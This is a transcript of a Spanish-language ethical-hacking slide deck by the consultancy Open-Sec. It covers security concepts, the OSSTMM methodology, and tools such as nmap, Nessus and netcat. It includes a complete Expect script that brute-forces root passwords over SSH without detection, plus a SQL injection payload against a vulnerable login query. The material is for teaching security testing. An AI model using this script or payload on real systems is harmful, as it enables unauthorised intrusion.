ethical hacking con software libre
TRANSCRIPT
www.Open-Sec.com
ETHICAL HACKING
Walter Cuestas, CEHGerente [email protected]
Carlos RenzoGerente de [email protected]
Mauricio UrizarConsultor [email protected]
http://www.open-sec.com
www.Open-Sec.com
Por qué Open-Sec ?
Unico partner de Digium en Perú y Ecuador y uno de los 6 partners en Latino América.
Consultores expertos en Comunicaciones Unificadas. Consultores expertos en Soluciones de Telefonía VoIP.
Consultores expertos en seguridad VoIP. Open-Sec entrega 1 AÑO DE SOPORTE DIRECTO DE
DIGIUM.
Unica empresa en Perú que cuenta con consultores certificados como Certified Ethical Hacker por EC Council, la certificación de más prestigio a nivel internacional en ethical hacking.
Nuestros consultores saben como atacar y defender. En el 2007, Open-Sec realizó el 80% de los procesos de Ethical Hacking en
Perú.
Unica empresa peruana afiliada a ISECOM, orgaización líder en Seguridad de la Información y Seguridad Informática a nivel mundial.
Unica empresa en Perú que aplica la metodología OSSTMM (Open Source SecureTesting Methodology).
Los resultados de las evaluaciones que realizamos pueden ser validados ante ISECOM.
Pioneros en consultorías respecto a la NTP 17799
Las instalaciones más grandes en Perú se basan en SuSE Linux (Poder Judicial, BBVA).
Open-Sec entrega soporte a estas instalaciones mediante consultores expertos y certificados.
Miembros del proyecto OpenSUSE
www.Open-Sec.com
Quiénes somos ?
•Un Equipo de Consultores con experiencia en organizaciones corporativas, estatales y privadas en
∙ Ethical Hacking∙ Computación Forense∙ Aseguramiento∙ Voz sobre IP∙ Seguridad de la Información
www.Open-Sec.com
Principales Clientes de Open-Sec
Seguridad Informática Seguridad de la Información
Linux y Open Source
Estudio CaballeroBustamante
Qué dicen las estadísticas ?
Conocimientotécnicorequerido
Sofisticación de las herramientas de los atacantes
Manipulación dePaquetes / Spoofing
19901980
AdivinarPasswords
Programasautoreplicados
Password Cracking
Explotación devulnerabilidadesconocidas Deshabilitar
auditorías
Back Doors
Sweepers
Sniffers
Análisis “Ocultos”
Alto
Bajo 2000+
DDoS
Gusanos enInternet
O-day exploits
www.Open-Sec.com
Seguridad de la Información
www.Open-Sec.com
Seguridad es el No. 2.
Por qué está en el mundo de los negocios?
Es la seguridad SU negocio?
Sí no, qué esta protegiendo Ud.?
Puede contarlo ? Tiene un valor?
Por qué usan computadoras ?
Productividad, eficiencia, costos Riéndose con un amigo de las fotos corporativas que
encontró en su red wireless
Admin borrando logs después de bajar películas toda la
ncohe
Reenvia correos de su jefe a un reportero aún cuando ella no tiene derechos para
ello
Vende lapiceros y toner por Internet, los
“toma” del trabajo
Cambiando las fechas en los registros de
impuestos antes de una audotoría
www.Open-Sec.com
Qué es seguridad ???
Proteger la información de un amplio espectro de amenazas, a efectos de asegurar la continuidad del negocio, minimizar los daños a la organización y maximizar el retorno de inversiones y las oportunidades del negocio.
Asegurar que los recursos del sistema de información (material informático o programas) de una organización sean utilizados de la manera que se decidió..
Seguridad de la Información
Seguridad Informática
www.Open-Sec.com
ExploitsDa
orígen a
Conducea
PuedeDañar
YCausar
un
Que generala aplicación de medidas de
Afectadirectamente
ActivoExposure
Agente de Amenaza
Amenaza
Vulnerabilidad
Protección
Debilidades que puedenproveer de accesono autorizado a
los recursos
Cualquier daño potencial a los sistemas de información
Probabilidad que un Agente de
Amenaza explote una vulnerabilidad
Riesgo
Actúa en las Amenazas
Actúa en las Amenazas
Instancia en que es
expuesto a perdidas debido al Agente de Amenaza
Amenazas, vulnerabilidades & riesgos
www.Open-Sec.com
Ethical Hacking ....
www.Open-Sec.com
“Hackeando” ?
www.opensec.com
www.Open-Sec.com
Nuestros “hackers”...
www.Open-Sec.com
Los REALES...
www.Open-Sec.com
Ellos las prefieren GORDAS...?
www.Open-Sec.com
Wow! Tengo que aprender mucho!
www.Open-Sec.com
No tanto...Uds ya son “viejos”....
www.Open-Sec.com
Vulnerabilidades Frecuentes
Cliente
Remoto
0.Ausencia de SPPPG.1.Configuración no decuada de router.2.RAS no asegurado ni monitoreado.3.Fuga de información.4.Servicios innecesarios.5.Passwords débiles.6.Cuentas con demasiado privilegio.7.Servicios Internet mal configurados.8.Firewall mal configurado.9.Ausencia de parches o configuración default.10.Derechos excesivos sobre recursos.11.Excesivas relaciones de confianza.12.Servicios no autenticados/autorizados.13.Ausencia de IDPS(NIPDS,NNIPDS,HIDPS).
Router
Internet
RAS
Oficina
Remota
Firewall
Router
Interno
DMZIDPS
VLAN1
Red Interna
VLAN2
www.Open-Sec.com
Estudios y Certificaciones, se requieren ?
www.Open-Sec.com
EL HACKING
ES UN ARTE LA EVALUACIÓN
DESEGURIDAD
ES UNACIENCIA
www.Open-Sec.com
No se requiere tan poco como esto...
www.Open-Sec.com
Perotampocotantocomo esto....
www.Open-Sec.com
Se requiere una metodología...
Obtención de Información y Footprinting
Trofeo
Evidencia
Borrado de
Rastros
Escalamiento de PrivilegiosObtención
de
Acceso
Análisis
de
Vulnerabilidades
Scanning
y
Enumeración
Footprint
www.Open-Sec.com
Peromejoruna de VERDAD, ESTANDARIZADA,DOCUMENTADA,MANTENIDA,ACEPTADA, CERTIFICABLE
www.opensec.com
www.Open-Sec.com
OSSTMM :Metodología
Cuantificable
www.Open-Sec.com
A qué ayuda OSSTMM ? A pasar del caos (desorden sin resultado positivo) y la frustración ...
www.Open-Sec.com
... a solamente esperar por los resultados...bueno, es un decir...
www.Open-Sec.com
Análisis de Vulnerabilidad versus Pruebas de Penetración
Herramientas automatizadas versus “Análisis a pulso”
www.Open-Sec.com
Ejemplo de Vulnerabilidad Confirmada
www.Open-Sec.com
Revisión de la Inteligencia Competitiva
Sólo un ejemplo de OSSTMM, entonces, ...
www.Open-Sec.com
Las Herramientas....
www.Open-Sec.com
HerramientaNro 1
www.Open-Sec.com
www.Open-Sec.com
www.Open-Sec.com
www.Open-Sec.com
www.Open-Sec.com
www.Open-Sec.com
Muchas veces tendrán que compilar...
www.Open-Sec.com
Casi siempre requerirán acceso tipo root...aunque algunas tienen su versión para MS Windows...nadie es perfecto :(
www.Open-Sec.com
Herramienta Nro 2 : NMAP (Network MAPper)
www.Open-Sec.com
NMAPFENMAP CLI
www.Open-Sec.com
nmap -P0 -v -oA archivo_log direccion_ipnmap -sR -A -P0 -v -oN archivo_log direccion_ip
Las más usadas :
www.insecure.org
www.Open-Sec.com
PASSIVE OS fingerprint scanning
Conexiones entrantes p0f
Conexiones salientesp0f -A -S -M-A SYN/ACK-S mostrar incluso firmas conocidas-M detectar NAT
192.165.38.73:20908 - OpenBSD 3.0-3.4 (up: 836 hrs) -> 217.8.32.51:80 (distance 6, link: GPRS or FreeS/WAN) 192.165.38.73:21154 - Linux 2.4/2.6 (NAT!) (up: 173 hrs) -> 217.8.32.51:80 (distance 6, link: GPRS or FreeS/WAN) 192.165.38.73:22003 - Windows XP Pro SP1, 2000 SP3 (NAT!) -> 217.8.32.51:80 (distance 6, link: GPRS or FreeS/WAN)
>> Masquerade at 192.165.38.73: indicators at 69%.
www.Open-Sec.com
Herramienta Nro 3
Con la versión 3, ir a http://www.openvas.org/doku.php
www.nessus.org
www.Open-Sec.com
Instalación de Nessus :
• Servidor v3– Seleccionar “Nessus 3.0.6 for Linux”.– Registrarse para envió de código de activación– Descargar archivo según distribución linux
• Nessus-3.0.6-suse10.0.i586.rpm• Disponible para todos los sistemas Unix
– Instalar archivo descargado.
www.Open-Sec.com
Ejecución del cliente :
#nessus &
www.Open-Sec.com
NessConnect : El mejor cliente de Nessus...
www.Open-Sec.com
VulnerabilidadesaniveldeAplicaciones
www.Open-Sec.com
Herramienta Nro. 4 : wikto
http://www.sensepost.com/research/wikto/
www.Open-Sec.com
Varios en uno solo : Spider, Fingerprint, Wikto, Googler
www.Open-Sec.com
Herramienta Nro 5
NetCat
/\_/\ / 0 0 \ ====v==== \ W / | | _ / ___ \ / / / \ \ | ((()))' / ( ___ \__.=|___E /
http://netcat.sourceforge.net/
www.Open-Sec.com
www.Open-Sec.com
www.Open-Sec.com
Herramientas Nro 6
Simples Scripts#!/usr/bin/expect -f## simple expect exploit to brute force root's password via ssh without# detection.. see CLABS200101 for info on this exploit.## this is beerware, just buy me a beer at defcon if you like this.# build your own dictionary, use at your own risk, no warranty, etc.## [email protected] january, 2001#
set timeout 3set target [lindex $argv 0]set dictionary [lindex $argv 1]
if {[llength $argv] != 2} { puts stderr "Usage: $argv0 root@target dictionary\n" exit }
set tryPass [open $dictionary r]
foreach passwd [split [read $tryPass] "\n"] { spawn ssh $target expect ":" send "$passwd\n" expect "#" { puts "password is $passwd\n" ; exit } set id [exp_pid] exec kill -INT $id}#www.hack.co.za
www.Open-Sec.com
Herramienta Nro 7Wireless Hacking : Kismet
www.opensec.com
www.Open-Sec.com
Herramienta Nro 8Secuestro de Sesiones y Más!
www.opensec.com
www.Open-Sec.com
Herramienta Nro 9SQL Injection – La Moda
www.opensec.com
' or 1=1
sql = "SELECT * FROM users WHERE username = '" + username + "' AND userpass = '" + password + "'"
SELECT * FROM users WHERE username = '' or 1=1--' AND userpass =''
www.Open-Sec.com
Herramienta Nro 10Apelando a la inocencia...
www.opensec.com
www.Open-Sec.com
Hacking VoIP
Políticas y Procedimientos
Seguridad del Sistema Operativo
Seguridad Servicios Complementarios
(web, DHCP, bases de datos)
Seguridad de la Red (IO,TCP,UDP)
Seguridad Física
Buffer overflow, configuración débil,
DoS, gusanos
Fraude de llamadas, fuzzing,
INVITE/BYE/CANCEL floods, call hijacking,
call eavesdropping, modificación de llamadas
Passwords débiles en el correo
de voz, abuso de larga distancia
Servidor expuesto, DoS, Reboot
SYN flooding, ICMP unreacheable,
DDoS
SQL Injection, saturación de DHCP
Seguridad del protocol
VoIP y Aplicaciones
www.Open-Sec.com
Asterisk
Scanning
The 65527 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
111/udp open|filtered rpcbind
631/udp open|filtered unknown
694/udp open|filtered unknown
2727/udp open|filtered unknown
4520/udp open|filtered unknown
4569/udp open|filtered unknown IAX
5060/udp open|filtered sip SIP
5353/udp open|filtered unknown
32768/udp open|filtered omad
www.Open-Sec.com
Herramienta 11 : Wireshark !!!
+ VoMIT + waveplayer
www.Open-Sec.com
Herramienta 12 : SiVuSRequestLine: REGISTER sip:10.1.101.99 SIP/2.0
Method: REGISTER
Resent Packet: False
Message Header
Via: SIP/2.0/UDP 10.1.101.99:5060;
branch=83c598e06fce4414afdd11a8acd30527
From: 4000 <sip:[email protected]>;
tag=83c5ac5c6fce441480cede7720487e25
To: 4000 <sip:[email protected]>
CallID: 83c5baaa6fce44148ff6f57c46985163
CSeq: 1 REGISTER
MaxForwards: 70
Contact: *
Expires: 0
ContentLength: 0
www.Open-Sec.comwww.opensec.com
www.Open-Sec.com
www.Open-Sec.com
Sóloelcieloesellímite...
www.opensec.com
www.Open-Sec.com
DEFCON
No hay victimas, SOLO VOLUNTARIOS